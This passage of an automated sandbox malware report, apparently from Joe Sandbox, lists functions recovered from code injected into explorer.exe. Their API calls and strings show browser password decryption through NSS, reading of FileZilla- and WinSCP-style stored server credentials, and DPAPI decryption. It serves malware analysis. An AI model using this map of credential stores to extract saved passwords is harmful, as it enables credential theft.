                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0300358F
                        • lstrcmpiW.KERNEL32(00000000,File), ref: 030035B6
                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 030035DE
                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 030035F6
                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 03003606
                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0300361E
                        • GetFileSize.KERNEL32(?,00000000), ref: 03003631
                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 03003658
                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0300366B
                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 03003681
                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 030036AD
                        • CloseHandle.KERNEL32(?), ref: 030036C0
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 030036F5
                          • Part of subcall function 03001C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CC0
                          • Part of subcall function 03001C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CDA
                          • Part of subcall function 03001C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03001CE6
                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 03003707
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                        • String ID: File
                        • API String ID: 3915112439-749574446
                        • Opcode ID: 37b2e81e1dbfe7d70303cadf9216a1dff2ee1ceef7eb75124601fc60bb5bf14b
                        • Instruction ID: 0932f4bb1064439779e85c817aaf871cb3ab397af14f7d183ef9272ce426fc34
                        • Opcode Fuzzy Hash: 37b2e81e1dbfe7d70303cadf9216a1dff2ee1ceef7eb75124601fc60bb5bf14b
                        • Instruction Fuzzy Hash: 2961D179206304AFE7A1EF21CC44B2FBBE9EB84751F041828F986D62D0DB76D8448B55
                        Function 03054438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                        Download Yara Rule
                        APIs
                        • memcmp.NTDLL ref: 03054502
                        • memcmp.NTDLL ref: 0305475F
                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 03054803
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcmp$memcpy
                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                        • API String ID: 231171946-1096842476
                        • Opcode ID: 557e792fc912f901a459e37e184650092fad0ace178727e55200640527f87733
                        • Instruction ID: 79cc7a6ff0395d478edbdceba000cb91ac2c456a95258a65b08968d4280f538e
                        • Opcode Fuzzy Hash: 557e792fc912f901a459e37e184650092fad0ace178727e55200640527f87733
                        • Instruction Fuzzy Hash: 43C11474A0B3859BDB74CE1AC4907FBB7D5AF89214F08096EFCD58B282D724D485CB52
                        Function 03006E6A Relevance: 16.7, APIs: 5, Strings: 4, Instructions: 955COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,$-x0$Inf$NaN
                        • API String ID: 0-2346028406
                        • Opcode ID: 38c2376a434ff9fc2ed4bafbb4161c32788a43f869c893b1950456f1a1d28f23
                        • Instruction ID: 452b2a7afeadc4bd3254cab69173d26d82c8ad16a43babfc00941fc4d70ae7bb
                        • Opcode Fuzzy Hash: 38c2376a434ff9fc2ed4bafbb4161c32788a43f869c893b1950456f1a1d28f23
                        • Instruction Fuzzy Hash: 08624671A0A3828BF325CE28C4903AFBFE5AFC5A44F184D5DE4C1973D1D669E945CB82
                        Function 03025F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03006AAA: memset.NTDLL ref: 03006AC5
                        • memset.NTDLL ref: 03025F53
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                        • API String ID: 2221118986-594550510
                        • Opcode ID: 449020491966243f631414b1882c5499504e539112a05c73890032175fae17b5
                        • Instruction ID: dfb7243a2df7f5c2127b24b4da727a4e3c82d6b356bd01c0c356a9c6a01247e4
                        • Opcode Fuzzy Hash: 449020491966243f631414b1882c5499504e539112a05c73890032175fae17b5
                        • Instruction Fuzzy Hash: 86C1AD746067159FDB54DF24C880A6FBBE6BFC8700F08892DF8848B241D776E816CB92
                        Function 03002112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03002127
                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0300213A
                        • wsprintfA.USER32 ref: 0300214F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                        • String ID: %li
                        • API String ID: 4120667308-1021419598
                        • Opcode ID: 51f62cc3e2c1292bd4d9421127e4ac7d356b9aeddde9240bb00db9f7a3077f0e
                        • Instruction ID: cc0df8b43050281b077de2982554ecec18ecb3e1df8f7bba469c5ee9306e97f6
                        • Opcode Fuzzy Hash: 51f62cc3e2c1292bd4d9421127e4ac7d356b9aeddde9240bb00db9f7a3077f0e
                        • Instruction Fuzzy Hash: 8CE0923664230877D7217BB89C06FEF7B6CDB40A16F444291F900A6185D9634A2487D5
                        Function 0300123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03003E4B,00000000), ref: 0300124A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001268
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001295
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                        • String ID:
                        • API String ID: 117552131-0
                        • Opcode ID: 4d133326c7b87322a2080cacb5164bcdf4f89ad6979b99677e10466bf64ef26c
                        • Instruction ID: 7cd2331e8787026b69f6592a1c33192517147daa29ceba9f1bdc165add2b3455
                        • Opcode Fuzzy Hash: 4d133326c7b87322a2080cacb5164bcdf4f89ad6979b99677e10466bf64ef26c
                        • Instruction Fuzzy Hash: 93014F72215305AFE718DF55DC89FBBB7ACEB85661F04462EF50186280DBA29C058660
                        Function 030011E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030046E3), ref: 030011ED
                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0300120F
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03001231
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                        • String ID:
                        • API String ID: 117552131-0
                        • Opcode ID: f93d2d079bb1da39c2b537e33176e5428a6cf5a5a7d11be4625cac3f39418450
                        • Instruction ID: a269a12ba7e4b54a2f6a868579944a5e155e7866306a55cf00b766e343f2150b
                        • Opcode Fuzzy Hash: f93d2d079bb1da39c2b537e33176e5428a6cf5a5a7d11be4625cac3f39418450
                        • Instruction Fuzzy Hash: DBF0907620630E7BE314DE56DC80FA7BB9DEF95794F15002EB601C6180DEA6EE0986B4
                        Function 03001FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03001FFA
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03002015
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CryptDataMemoryMoveUnprotect
                        • String ID:
                        • API String ID: 2807545630-0
                        • Opcode ID: 21c269085a490359ada02c5f9ce7da51063555a491332e0a2272cc18935c0d4c
                        • Instruction ID: 323b1531666c150ad9507d1cae8a6a360f89d23adc77661badf2384801e025ab
                        • Opcode Fuzzy Hash: 21c269085a490359ada02c5f9ce7da51063555a491332e0a2272cc18935c0d4c
                        • Instruction Fuzzy Hash: 67011E75A02219ABDB14DA9AD9889AFFBBCEF45250F10056AA905D3241D7719A10CBA0
                        Function 03001198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030011B2
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030011D2
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        • Opcode ID: 6b5443222136e64e669b04e18da6e6eeb4bb0c6b1840e7d275d97916d805b5be
                        • Instruction ID: 45cb12b4510bcad5f943ff68bab6c02355f8c6d945b7c365a0fff1f773512e6b
                        • Opcode Fuzzy Hash: 6b5443222136e64e669b04e18da6e6eeb4bb0c6b1840e7d275d97916d805b5be
                        • Instruction Fuzzy Hash: 32F0A73A60121877D728D59BDC88EEBFBADDF857A1F140169F909D7140DAA29D0483A0
                        Function 0301B35C Relevance: 2.9, APIs: 2, Instructions: 383COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv_allmul
                        • String ID:
                        • API String ID: 727729158-0
                        • Opcode ID: 1824eeae8ae0942902d31da2aa75383cd8aab7048922ec52d78598dd0410ef9f
                        • Instruction ID: c09a7e6d897658be459bb5fb17746feac53f2e6bba4c4fdf7d5235c2eedc5a04
                        • Opcode Fuzzy Hash: 1824eeae8ae0942902d31da2aa75383cd8aab7048922ec52d78598dd0410ef9f
                        • Instruction Fuzzy Hash: FCD19275A067129BC765EF25C4D0A6EB3E6BFC8354F048A2DE8859B750DB30EC61CB81
                        Function 0301B97E Relevance: .4, Instructions: 382COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54e1ecce57f824da3eb3cdfbdecb947dba197d2d0695b1fd59bf666e54fd7f42
                        • Instruction ID: db3f4682bfe986bbfa9bc6cc30f6d2cd6eb959a5a1a190095ad2a7a29ea56bf2
                        • Opcode Fuzzy Hash: 54e1ecce57f824da3eb3cdfbdecb947dba197d2d0695b1fd59bf666e54fd7f42
                        • Instruction Fuzzy Hash: 08C14B6391A6814FF725CA3C88412ADBB93FFA2110F1CC9ADD4E98B7C3D129D64AC355
                        Function 0300C2F9 Relevance: .2, Instructions: 166COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        • Opcode ID: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                        • Instruction ID: 1c85d080c8bdbaf92021ad30974cc929ac4a0cb878650f3d98703e91475f790f
                        • Opcode Fuzzy Hash: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                        • Instruction Fuzzy Hash: 9251E4766067044BF714EE64C8806BEB3D6EFC8204F188B3DE8D69F6D1DA75D8058751
                        Function 03004440 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 289stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • SysAllocString.OLEAUT32(?), ref: 030044AA
                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0300456E
                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0300457D
                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0300458C
                          • Part of subcall function 030011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030046E3), ref: 030011ED
                          • Part of subcall function 030011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0300120F
                          • Part of subcall function 030011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03001231
                        • lstrcmpiW.KERNEL32(Server,?), ref: 030045BE
                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 030045CD
                        • lstrcmpiW.KERNEL32(Host,?), ref: 03004657
                        • lstrcmpiW.KERNEL32(Port,?), ref: 03004679
                        • lstrcmpiW.KERNEL32(User,?), ref: 0300469F
                        • lstrcmpiW.KERNEL32(Pass,?), ref: 030046C5
                        • wsprintfW.USER32 ref: 0300471E
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcmpi$String$BinaryCrypt$Alloclstrlenwsprintf
                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                        • API String ID: 1416614492-1234691226
                        • Opcode ID: e981efc3f920478edb0da3ec86049b6019efe9bffdf685c9313cf2970eb6309f
                        • Instruction ID: 2bf44972e15a6dd913f9a57ddd2e877aa5a9194cd659e008276221bedc488148
                        • Opcode Fuzzy Hash: e981efc3f920478edb0da3ec86049b6019efe9bffdf685c9313cf2970eb6309f
                        • Instruction Fuzzy Hash: 0FB13671205306AFE740DF65C884E6BB7E9AFC9744F00895CF6998B260DB72E806CB52
                        Function 030024B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 03001090: lstrlenW.KERNEL32(?,?,00000000,030017E5), ref: 03001097
                          • Part of subcall function 03001090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 030010A8
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 03002503
                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0300250A
                        • LoadLibraryW.KERNEL32(00000000), ref: 03002563
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 03002570
                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 03002591
                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0300259E
                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 030025AB
                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 030025B8
                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 030025C5
                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 030025D2
                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 030025DF
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,?), ref: 03001946
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                        • API String ID: 3366569387-3272982511
                        • Opcode ID: ad5fade4319ccf0af057f3d13f61ab158f314139220d8649a4cda3b58a7e25e7
                        • Instruction ID: 11b82a54b9e38993cdff9a2f801d61c96b2ebb794467ad96fc283cb3b33762c3
                        • Opcode Fuzzy Hash: ad5fade4319ccf0af057f3d13f61ab158f314139220d8649a4cda3b58a7e25e7
                        • Instruction Fuzzy Hash: 8B416A39A033099BEB5CFF35985856F7AED9BC5741F44082EE8819B2C9DF798C018B51
                        Function 03005E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03005BF5: memset.NTDLL ref: 03005C07
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030060E1
                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030060EC
                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 03006113
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0300618E
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030061B5
                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030061C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv$_allrem$memset
                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                        • API String ID: 2557048445-1989508764
                        • Opcode ID: eed50243f0c843bfb03b58b5344de25555f73e6909e59c45c9b6a66d9a8714e5
                        • Instruction ID: 9c0614f1657d3be6db1ef528a59caccc691b507a8fb52b81174ffd6a06b9d306
                        • Opcode Fuzzy Hash: eed50243f0c843bfb03b58b5344de25555f73e6909e59c45c9b6a66d9a8714e5
                        • Instruction Fuzzy Hash: A7B1A3B190E7469BF725DE28CC84B7FBFD5FB81304F1C0959F8829A1C1EB26D5208A95
                        Function 0301D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                        • API String ID: 1475443563-3683840195
                        • Opcode ID: 7107d990e1d94d53dde29f3d655ac3ac98dbfd40be4504cf4aaa18fb402eaa5f
                        • Instruction ID: f7c3e7bfee49d32c05248faa6c379e11534f84cbd369f6e5dc41a704c36b127f
                        • Opcode Fuzzy Hash: 7107d990e1d94d53dde29f3d655ac3ac98dbfd40be4504cf4aaa18fb402eaa5f
                        • Instruction Fuzzy Hash: 2951C031606300AFD725DF64CC40ABBB7E5AB89600F084869FDA28F241E775E925DBA5
                        Function 030048B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 03004845
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 0300488F
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 03004897
                        • wsprintfW.USER32 ref: 030049A7
                        • wsprintfW.USER32 ref: 030049B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                        • API String ID: 2889301010-4273187114
                        • Opcode ID: 3142b3a06f198e77878bc5c537caa69b86c9ed557832f349d7f3e17ea4661b22
                        • Instruction ID: 8aadb44012b9ddeb585674b7eb0d6f1e964bdd681135a0903809486a981a97f5
                        • Opcode Fuzzy Hash: 3142b3a06f198e77878bc5c537caa69b86c9ed557832f349d7f3e17ea4661b22
                        • Instruction Fuzzy Hash: 7431E93970A3045BE754EB67C84492FB6DDDFC9648F09452DB5858B2C0DBB2DC018BD5
                        Function 0300F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                        Download Yara Rule
                        APIs
                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0300FB32
                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0300FB4D
                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0300FB60
                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0300FB95
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: -journal$-wal$immutable$nolock
                        • API String ID: 3510742995-3408036318
                        • Opcode ID: c8876c98404823e5a27f4b989448c46c78e8cde9c37ba02339e42b474c6f9c25
                        • Instruction ID: f110d296d4418f6c06df9fd10ab21e4e2fcd996dd261a6cd9b7ba62a1123e7ea
                        • Opcode Fuzzy Hash: c8876c98404823e5a27f4b989448c46c78e8cde9c37ba02339e42b474c6f9c25
                        • Instruction Fuzzy Hash: 43D1E4B56093428FEB24DF28C890B5BBBE5AF85210F08456DEC999F3C2DB75D805CB52
                        Function 03007820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: %$-x0$NaN
                        • API String ID: 0-62881354
                        • Opcode ID: 88d17899455060f4ee84027e63b88492de0676e61eb3d3da277a2df3b16a82ef
                        • Instruction ID: d194e2000f4d698979e03ea9f0813ffa185671e474a9c3a452249d2c0e90e432
                        • Opcode Fuzzy Hash: 88d17899455060f4ee84027e63b88492de0676e61eb3d3da277a2df3b16a82ef
                        • Instruction Fuzzy Hash: B5D1F33060E3828BF765CA28C49077FFBE6AFC5A04F18499DF8C1972D1D669E545C782
                        Function 030078B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        • Opcode ID: fa1fb8a1ab55f9ade4f030f8ce6a187f6b1827c051fba3688230eb5a0dd8f7bc
                        • Instruction ID: 27b6037b02f89b66a5cb8f17e4c6c2a1f57e308cc89b9ddd3e402cb7f8edbfcf
                        • Opcode Fuzzy Hash: fa1fb8a1ab55f9ade4f030f8ce6a187f6b1827c051fba3688230eb5a0dd8f7bc
                        • Instruction Fuzzy Hash: DAE1F53060E3828BF765CA28C45077FFBE6AFC6A04F18495DE8C1973C1D669E941C792
                        Function 03007A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        • Opcode ID: c6cfd14aa2998e1cd29b517b675438920071ac92cf9dfe02a274d209a2690d8e
                        • Instruction ID: 06d282e5f70b48523204b8e5c5c2aad24e47e652724533e3f01e13c96cf0ba5e
                        • Opcode Fuzzy Hash: c6cfd14aa2998e1cd29b517b675438920071ac92cf9dfe02a274d209a2690d8e
                        • Instruction Fuzzy Hash: C0E1E23060A3828BF765CA28C49077FFBE6AFC5A04F18499DF8C1973C1D669E945C792
                        Function 03007A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                        Download Yara Rule
